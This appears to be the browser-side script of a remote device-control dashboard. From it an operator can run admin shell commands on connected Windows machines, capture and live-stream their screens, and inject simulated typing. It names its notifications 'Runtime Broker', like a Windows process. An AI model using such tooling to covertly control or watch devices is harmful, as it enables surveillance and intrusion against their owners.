const $=id=>document.getElementById(id);const esc=s=>String(s??'').replace(/[&<>"']/g,c=>({'&':'&amp;','<':'&lt;','>':'&gt;','"':'&quot;',"'":'&#39;'}[c]));
let agents=[],target=null,timer=null,socket=null,imageB64=null,searchTimer=null;
function handleAuthResponse(r){if(r.status===401){location.replace('/login');throw Error('Authentication required')}return r}
function logout(){fetch('/api/logout',{method:'POST'}).finally(()=>location.replace('/login'))}
function loadMonitor(){const q=encodeURIComponent($('deviceSearch').value.trim());fetch(`/api/agents${q?'?q='+q:''}`).then(handleAuthResponse).then(r=>r.json()).then(list=>{agents=list;const online=list.filter(a=>a.online).length;$('agentsHeader').textContent=`${online} online · ${list.length} devices`;$('agentsSummary').textContent=`${list.length} device(s) · ${online} online`;$('deviceCards').innerHTML=list.length?list.map(a=>`<article class="device-card" onclick="openDevice('${esc(a.machineName)}')"><div class="device-card-head"><h3>${esc(a.hostname||a.machineName)}</h3><span class="badge ${a.online?'badge-resolved':'badge-offline'}">${a.online?'Online':'Offline'}</span></div><p>${esc(a.ip||'No IP')}</p><p>${esc(a.model||'')} ${esc(a.version||'')}</p></article>`).join(''):'<div class="muted">No devices connected.</div>'}).catch(()=>{$('agentsHeader').textContent='Server unavailable'})}
function openDevice(machine){target=agents.find(a=>a.machineName===machine);if(!target)return;$('devicesPage').style.display='none';$('devicePage').style.display='block';$('deviceTitle').textContent=target.hostname||target.machineName;$('deviceMeta').textContent=[target.ip,target.model,target.version].filter(Boolean).join(' · ');$('deviceStatus').textContent=target.online?'Online':'Offline'}
function showDevices(){closeLive();$('devicePage').style.display='none';$('blockedPage').style.display='none';$('settingsPage').style.display='none';$('devicesPage').style.display='block';setNav('navDevices');loadMonitor()}
function showBlocked(){$('devicePage').style.display='none';$('settingsPage').style.display='none';$('devicesPage').style.display='none';$('blockedPage').style.display='block';setNav('navBlocked');loadBlockedDevices()}
function showSettings(){$('devicePage').style.display='none';$('blockedPage').style.display='none';$('devicesPage').style.display='none';$('settingsPage').style.display='block';setNav('navSettings');loadServerInfo()}
function setNav(id){['navDevices','navBlocked','navSettings'].forEach(n=>$(n).classList.toggle('active',n===id))}
let blockedTimer=null;
function loadBlockedDevices(){fetch('/api/admin/blocked-devices').then(handleAuthResponse).then(r=>r.json()).then(map=>{const ids=Object.keys(map||{});$('blockedList').innerHTML=ids.length?ids.map(id=>{const d=map[id];return `<div class="blocked-card"><div><b>${esc(id)}</b><small>${d.attempts||0} failed attempts${d.lockedAt?' · since '+esc(String(d.lockedAt).slice(0,19).replace('T',' ')):''}</small></div><button class="btn-primary" onclick="unlockDevice('${esc(id)}')">Unlock</button></div>`}).join(''):'<div class="muted">No blocked devices — all clear ✅</div>'}).catch(()=>{$('blockedList').innerHTML='<div class="muted">Failed to load blocked devices.</div>'})}
function unlockDevice(deviceId){fetch('/api/admin/unlock-device',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({deviceId})}).then(handleAuthResponse).then(()=>loadBlockedDevices())}
setInterval(()=>{if($('blockedPage').style.display!=='none')loadBlockedDevices()},10000);
const THEMES=[["Midnight","#0b1120","#111a2e","#172238","#263650","#f8fafc","#94a3b8","#3b82f6"],["Ocean","#020617","#0c1a2b","#12233a","#1e3a5f","#e0f2fe","#7dd3fc","#0ea5e9"],["Aurora","#052e24","#0a3d2f","#0f4a39","#14532d","#ecfdf5","#6ee7b7","#10b981"],["Solar Flare","#1c1004","#291a08","#38230c","#7c2d12","#fffbeb","#fdba74","#f59e0b"],["Cyberpunk","#0f0524","#1a0b38","#251049","#3b0764","#f5f3ff","#c084fc","#a855f7"],["Royal Purple","#12051f","#1f0a35","#2b0f47","#4c1d95","#faf5ff","#d8b4fe","#8b5cf6"],["Forest Calm","#0a1410","#11201a","#182b22","#1e3a2f","#ecfdf5","#86efac","#22c55e"],["Slate Pro","#0f1216","#171c23","#1f262e","#334155","#f8fafc","#94a3b8","#64748b"],["Paper Light","#f8fafc","#ffffff","#f1f5f9","#cbd5e1","#0f172a","#64748b","#2563eb"],["Mint Fresh","#f0fdfa","#ffffff","#ccfbf1","#99f6e4","#134e4a","#14b8a6","#0d9488"]];
const THEME_NAMES=THEMES.map(t=>t[0]);
function applyTheme(i){const t=THEMES[i]||THEMES[0];[,bg,surface,surface2,border,text,muted,accent]=t;const r=document.documentElement.style;r.setProperty('--bg',bg);r.setProperty('--surface',surface);r.setProperty('--surface2',surface2);r.setProperty('--border',border);r.setProperty('--text',text);r.setProperty('--muted',muted);r.setProperty('--blue',accent);localStorage.setItem('wsm_theme',i)}
function buildThemeRow(){const row=$('themeRow');row.innerHTML='';const cur=Number(localStorage.getItem('wsm_theme')||0);THEME_NAMES.forEach((name,i)=>{const t=THEMES[i];const b=document.createElement('button');b.className='theme-tile'+(cur===i?' active':'');b.onclick=()=>{applyTheme(i);buildThemeRow();$('themeSubtitle').textContent=`Current: ${name} ✨`};b.innerHTML=`<span class="tt-preview" style="background:linear-gradient(135deg, ${t[1]} 55%, ${t[7]} 55%)"></span><span class="tt-name">${name}</span>`;row.appendChild(b)});$('themeSubtitle').textContent=`Current: ${THEME_NAMES[cur]} ✨`}
function loadServerInfo(){$('srvAddress').textContent=location.origin;$('srvHost').textContent=location.hostname||'—';const p=location.port;$('srvPort').textContent=p||(location.protocol==='https:'?'443 (default)':'80 (default)');fetch('/api/health').then(handleAuthResponse).then(r=>r.json()).then(d=>{$('srvVersion').textContent=(d.version||'—')+(d.ok?' ✅':' ⚠️');$('srvAgents').textContent=`${d.agents??0} online`;$('srvChecked').textContent=new Date().toLocaleTimeString()}).catch(()=>{$('srvVersion').textContent='unavailable';$('srvAgents').textContent='—';$('srvChecked').textContent=new Date().toLocaleTimeString()})}
function permText(){if(!('Notification'in window))return {t:'Not supported in this browser ❌',ok:false};const p=Notification.permission;if(p==='granted')return{t:'Granted — desktop alerts are active ✅',ok:true};if(p==='denied')return{t:'Blocked — allow it in your browser site settings 🚫',ok:false};return{t:'Not requested yet',ok:false}}
function refreshPerm(){const s=permText();$('permStatus').textContent=s.t}
function requestPerm(){if(!('Notification'in window)){refreshPerm();return}Notification.requestPermission().then(()=>{refreshPerm();try{new Notification('Runtime Broker',{body:'Notifications enabled ✅'})}catch(e){}})}
function initNotifications(){const t=$('notifToggle'),s=$('toneSelect');t.checked=localStorage.getItem('wsm_notif')!=='off';s.value=localStorage.getItem('wsm_tone')||'system';refreshPerm();t.onchange=()=>{localStorage.setItem('wsm_notif',t.checked?'on':'off');if(t.checked)requestPerm()};s.onchange=()=>{localStorage.setItem('wsm_tone',s.value);toneStatus(`Tone set to ${s.options[s.selectedIndex].text}`)}}
function toneStatus(msg){$('toneStatus').textContent=msg;clearTimeout(toneStatus._t);toneStatus._t=setTimeout(()=>{$('toneStatus').textContent=''},2500)}
function testTone(){const key=$('toneSelect').value,label=$('toneSelect').options[$('toneSelect').selectedIndex].text;
if(key==='system'){toneStatus(`▶ ${label} — handed to your OS default sound`);return}
const freqs={chime:[660,880],alert:[880,660,880],ding:[1320],soft:[440]};
try{const ctx=new AudioContext();(freqs[key]||[660]).forEach((f,i)=>{const o=ctx.createOscillator(),g=ctx.createGain();o.frequency.value=f;o.type=key==='soft'?'sine':'triangle';g.gain.value=.12;o.connect(g);g.connect(ctx.destination);o.start(ctx.currentTime+i*.18);o.stop(ctx.currentTime+i*.18+.16)});toneStatus(`▶ Playing ${label}…`)}catch(e){toneStatus('⚠️ Audio blocked by browser — interact with the page first')}}
applyTheme(Number(localStorage.getItem('wsm_theme')||0));
initNotifications();
function showTool(){const panel=$('toolPanel');panel.style.display='block';panel.scrollIntoView({behavior:'smooth',block:'center'})}
function focusTool(id){showTool();$(id).focus();$(id).scrollIntoView({behavior:'smooth',block:'center'})}
function output(value){$('consoleOutput').textContent=typeof value==='string'?value:JSON.stringify(value,null,2)}
function request(cmd,params={}){if(!target)return Promise.reject(Error('Select a device first'));return fetch(`/api/monitor/${encodeURIComponent(target.machineName)}/command`,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({cmd,params})}).then(handleAuthResponse).then(async r=>{const d=await r.json();if(!r.ok)throw Error(d.error||'Command failed');return d})}
function runShell(){const command=$('shellCommand').value.trim();if(!command)return;output('Running...');request('shell_exec',{command,timeoutSec:120,admin:true}).then(r=>output(r.output||r.error||'No output')).catch(e=>output('ERROR: '+e.message))}
function sendText(){const text=$('textCommand').value;if(!text)return;request('input_text',{text}).then(r=>output(r.output||'Text sent')).catch(e=>output('ERROR: '+e.message))}
function sendParagraph(){const text=$('paragraphCommand').value;if(!text)return;request('input_paragraph',{text,wpm:50,addEnter:true,async:true,timeoutSec:7200}).then(r=>output(r.output||'Paragraph started')).catch(e=>output('ERROR: '+e.message))}
function runDeviceCommand(cmd,params={}){showTool();output('Running...');request(cmd,params).then(r=>output(r.data??r.output??'Command completed')).catch(e=>output('ERROR: '+e.message))}
function runGenericCommand(){let params={};try{params=JSON.parse($('commandParams').value||'{}')}catch(e){output('ERROR: Parameters must be valid JSON');return}runDeviceCommand($('commandName').value,params)}
function listFiles(){runDeviceCommand('list_files',{path:'C:\\Windows\\System32'})}function listProcesses(){runDeviceCommand('list_processes')}function listServices(){runDeviceCommand('list_services')}function stopTyping(){runDeviceCommand('stop_typing')}function stopAudio(){runDeviceCommand('stop_audio')}function stopAll(){runDeviceCommand('stop_all')}
function captureMonitorNow(){if(!target)return;$('capture-panel')?.scrollIntoView({behavior:'smooth',block:'center'});$('monitorCaptureInfo').textContent='Capturing...';fetch(`/api/monitor/${encodeURIComponent(target.machineName)}/screenshot`,{method:'POST',headers:{'Content-Type':'application/json'},body:'{}'}).then(handleAuthResponse).then(async r=>{const d=await r.json();if(!r.ok)throw Error(d.error||'Capture failed');imageB64=d.image;$('monitorImg').src='data:image/png;base64,'+d.image;$('monitorImg').style.display='block';$('monitorCaptureInfo').textContent='Captured'}).catch(e=>{$('monitorCaptureInfo').textContent='ERROR: '+e.message})}
function copyMonitorImage(){if(!imageB64){captureMonitorNow();return}fetch('data:image/png;base64,'+imageB64).then(r=>r.blob()).then(blob=>navigator.clipboard?.write([new ClipboardItem({'image/png':blob})])).then(()=>{$('monitorCaptureInfo').textContent='Copied'}).catch(()=>{$('monitorCaptureInfo').textContent='Copy failed'})}
function openLive(){if(!target)return;const password=prompt('Enter server password for live screen')||'';if(!password)return;closeLive();$('liveWrap').style.display='block';$('liveWrap').scrollIntoView({behavior:'smooth',block:'center'});const scheme=location.protocol==='https:'?'wss':'ws';socket=new WebSocket(`${scheme}://${location.host}/ws/live/${encodeURIComponent(target.machineName)}?token=${encodeURIComponent(password)}&interval=500`);socket.onmessage=e=>{const d=JSON.parse(e.data);if(d.type==='frame')$('liveImg').src='data:image/jpeg;base64,'+d.image;else if(d.type==='error'){showTool();output('LIVE ERROR: '+d.error)}};socket.onopen=()=>{showTool();output('Live screen connected')};socket.onerror=()=>{showTool();output('Live screen connection failed')};socket.onclose=()=>{showTool();output('Live screen disconnected')}}
function closeLive(){if(socket){socket.close();socket=null}$('liveWrap').style.display='none'}
function clearConsole(){$('consoleOutput').textContent=''}
$('deviceSearch').addEventListener('input',()=>{clearTimeout(searchTimer);searchTimer=setTimeout(loadMonitor,300)});buildThemeRow();loadMonitor();setInterval(loadMonitor,5000);
